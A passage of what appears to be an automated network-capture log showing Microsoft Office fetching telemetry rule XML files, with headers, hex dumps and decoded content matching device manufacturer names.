                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            51192.168.2.54977913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:56 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:56 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 415
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                                                            x-ms-request-id: c530354f-501e-0016-5013-17181b000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030856Z-1657d5bbd4824mj9d6vp65b6n400000004f000000000tpqk
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:56 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            52192.168.2.54977813.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:56 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:56 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 499
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                            x-ms-request-id: 40323690-a01e-0002-0100-175074000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030856Z-1657d5bbd48cpbzgkvtewk0wu000000004m000000000044v
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:56 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            53192.168.2.54977713.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:56 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:56 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 428
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                            x-ms-request-id: 6be05283-001e-00a2-2700-17d4d5000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030856Z-1657d5bbd482tlqpvyz9e93p5400000004kg0000000014wq
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:56 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            54192.168.2.54978113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:57 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:57 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 419
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                            x-ms-request-id: d415a278-e01e-0051-6efe-1684b2000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030857Z-1657d5bbd48xdq5dkwwugdpzr000000004ng00000000nwnd
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:57 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            55192.168.2.54978013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:57 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:57 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 471
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                                                            x-ms-request-id: 7cec3a6f-e01e-0033-3414-174695000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030857Z-1657d5bbd48q6t9vvmrkd293mg00000004c0000000009xpq
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:57 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            56192.168.2.54978213.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:57 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:57 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 494
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                                                            x-ms-request-id: 688d2aae-a01e-0084-3466-179ccd000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030857Z-1657d5bbd482lxwq1dp2t1zwkc000000040g00000000u7g0
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:57 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            57192.168.2.54978313.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:57 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:57 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 420
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                            x-ms-request-id: 10df1352-f01e-00aa-105a-178521000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030857Z-1657d5bbd48tqvfc1ysmtbdrg0000000044000000000t5g1
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:57 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            58192.168.2.54978413.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:58 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:58 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 472
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                                                            x-ms-request-id: b27116a7-a01e-003d-3a00-1798d7000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030858Z-1657d5bbd48qjg85buwfdynm5w00000004g0000000009e7c
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:58 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            59192.168.2.54978513.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:58 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:58 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 427
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                                                            x-ms-request-id: 54e9c43f-c01e-000b-6df8-18e255000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030858Z-1657d5bbd48qjg85buwfdynm5w00000004h0000000005q50
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:58 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            60192.168.2.54978613.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:58 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:08:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:58 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 486
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                                                            x-ms-request-id: 92e59db7-001e-002b-6700-1799f2000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030858Z-1657d5bbd48tnj6wmberkg2xy800000004f000000000c93x
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:08:58 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


